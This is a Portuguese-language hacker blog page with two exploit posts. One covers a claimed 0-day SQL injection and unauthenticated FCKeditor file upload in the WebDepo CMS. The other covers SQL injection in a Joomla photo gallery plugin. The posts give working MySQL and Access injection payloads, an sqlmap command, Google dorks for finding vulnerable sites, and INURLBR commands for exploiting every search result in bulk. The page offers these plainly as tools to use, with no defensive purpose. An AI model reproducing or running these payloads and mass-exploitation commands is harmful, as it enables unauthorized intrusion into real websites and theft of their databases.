Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador MINI EXPLOIT. Mostrar todas as postagens
Mostrando postagens com marcador MINI EXPLOIT. Mostrar todas as postagens

sexta-feira, 27 de março de 2015

(0DAY) WebDepo - SQL injection

EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL

Nas minhas pesquisas na web, sobre file_upload descobre um CMS da empresa israelense WebDepo, o mesmo possui falha de file_upload sem autenticação, mas analisando seus GETS pude observar que também tem falhas SQLi em seus parâmetros GET.

AUTOR:       GoogleINURL
Blog:             http://blog.inurl.com.br
Twitter:         https://twitter.com/googleinurl
Fanpage:       https://fb.com/InurlBrasil
Pastebin:       http://pastebin.com/u/Googleinurl
GIT:              https://github.com/googleinurl
PSS:              http://packetstormsecurity.com/user/googleinurl
YOUTUBE:  http://youtube.com/c/INURLBrasil
PLUS:           http://google.com/+INURLBrasil



VENTOR:         http://www.webdepot.co.il
GET VULN:     wood=(id) / $wood=intval($_REQUEST['wood'])
  -----------------------------------------------------------------------------

DBMS: 'MySQL'
Exploit:      +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

DBMS: 'Microsoft Access'
Exploit:      +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
  -----------------------------------------------------------------------------

http://target.us/text.asp?wood=(id)+Exploit

GOOGLE DORK:   inurl:"text.asp?wood="
GOOGLE DORK:   site:il inurl:"text.asp?wood="
GOOGLE DORK:   site:com inurl:"text.asp?wood="  

Exploit:

Execute exploit:
--help:
  -t : SET TARGET.
  -f : SET FILE TARGETS.
  -p : SET PROXY
  Execute:
  php WebDepoxpl.php -t target
  php WebDepoxpl.php -f targets.txt
  php WebDepoxpl.php -t target -p 'http://localhost:9090'

DOWNLOAD Exploit: http://pastebin.com/b6bWuw7k
  -----------------------------------------------------------------------------

EXPLOIT MASS USE SCANNER INURLBR
COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --command-all "php 0dayWebDepo.php -t '_TARGET_'"


EXPLOIT MASS USE SCANNER INURLBR COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --comand-all "php 0dayWebDepo.php -t '_TARGET_'"

DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR

VÍDEO 
  -----------------------------------------------------------------------------

A segunda falha:
Exploit fckeditor 2015
Vídeo: https://www.youtube.com/watch?v=2g1xxkMVgPk  
GOOGLE DORK: inurl:"/text.asp?wood=" site:il
Exploit: -admin/fckeditor/editor/filemanager/brow­ser/default/browser.html?Connector=conne­ctors/asp/connector.asp

A segunda falha: Exploit fckeditor 2015  GOOGLE DORK: inurl:"/text.asp?wood=" site:il Exploit: -admin/fckeditor/editor/filemanager/brow­ser/default/browser.html?Connector=conne­ctors/asp/connector.asp

POC:
[1] - http://target.us/target-admin/fckeditor/editor/filemanager/brow­ser/default/browser.html?Connector=conne­ctors/asp/connector.asp

[2] - http://target.us/userfiles/file/{YOU_FILE}

terça-feira, 17 de março de 2015

MINI EXPLOIT: Joomla Simple Photo Gallery - SQL injection + VIDEO

Usando miniexploit para explorar em massa vários alvos.

Usando miniexploit para explorar em massa vários alvos. Title: Joomla Simple Photo Gallery - SQL injection Date : 13-03-2015 Vendor Homepage: https://www.apptha.com/ Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery Version : 1 Tested on : sqlmap

Title: Joomla Simple Photo Gallery - SQL injection
Date : 13-03-2015
Vendor Homepage: https://www.apptha.com/
Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
Version : 1
Tested on : sqlmap

POC:
http://{$target}/index.php?option=com_simplephotogallery&view=images&albumid=[SQLI]

Comando SQLMAP de exploração:
sqlmap  -u '{$target}/index.php?option=com_simplephotogallery&view=images&albumid=1' -p albumid --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba

DORK de pesquisa:
Dork Google 1: inurl:/com_simplephotogallery site:com
Dork Google 2: inurl:/com_simplephotogallery site:org
Dork Google 3: inurl:/com_simplephotogallery site:fr
Dork Google 4: inurl:/com_simplephotogallery/


Agora vamos organizar nosso comando INURLBR  para executar nosso miniexploit.php
Primeiro vamos organizar o parâmetro --dork que captura seu filtro de busca.

 --dork Defines which dork the search engine will use.
     Example: --dork {dork}
     Usage:   --dork 'site:.gov.br inurl:php? id'
     - Using multiples dorks:
     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'
Parâmetro organizado:
--dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/'

Baixar MINI exploit-SQLMAP / Joomla Simple Photo Gallery 1.0 - SQL injection: 
http://pastebin.com/Gb5uhPKW
File: miniexploit.php

Baixar scanner INURLBR 1.0:
https://github.com/googleinurl/SCANNER-INURLBR
File: inurlbr.php


Executando:
./inurlbr.php --dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/' -s save.txt -q 1,6 --command-all "php miniexploit2.php '_TARGET_'"